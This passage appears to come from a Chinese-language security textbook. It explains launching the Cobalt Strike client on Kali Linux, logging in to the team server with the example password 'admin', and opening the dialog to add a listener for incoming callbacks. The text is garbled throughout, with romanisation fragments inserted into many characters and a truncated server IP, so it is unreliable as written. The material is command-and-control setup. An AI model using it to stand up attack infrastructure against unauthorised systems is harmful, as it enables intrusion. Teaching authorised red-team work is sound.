e客戶端在Windows和Linux下都可以使用（注意運(yùn)行前安裝Java并配置相應(yīng)的環(huán)境變量）。此次在Kali中運(yùn)行客戶端，依然是在CobaltStrike相應(yīng)的文件夾中使用解壓后的文件夾，在終端輸入“./cobaltstrike”并執(zhí)行，啟動(dòng)客戶端，如圖4-17所示。圖4-17執(zhí)行命令啟動(dòng)客戶端（3）Strike服務(wù)器端的IP地址，本例中為“31”。在“密碼”文本框中填入剛剛在服務(wù)器端中設(shè)置的密碼，本例密碼為“admin”，如圖4-18所示。圖4-18設(shè)置CobaltStrike客戶端（4）設(shè)置完成后單擊“連接”按鈕就可以登錄CobaltStrike客戶端界面。顯示結(jié)果如圖4-19所示。圖4-19CobaltStrike客戶端界面（5）接下來需要?jiǎng)?chuàng)建監(jiān)聽器用于監(jiān)聽反饋。首先單擊“CobaltStrike”→“監(jiān)聽器”，如圖4-20所示。圖4-20創(chuàng)建監(jiān)聽器（6）通過上一步操作，我們打開了“監(jiān)聽器”選項(xiàng)卡，接下來單擊“添加”按鈕進(jìn)行下一步設(shè)置，如圖4-21所示。圖4-21在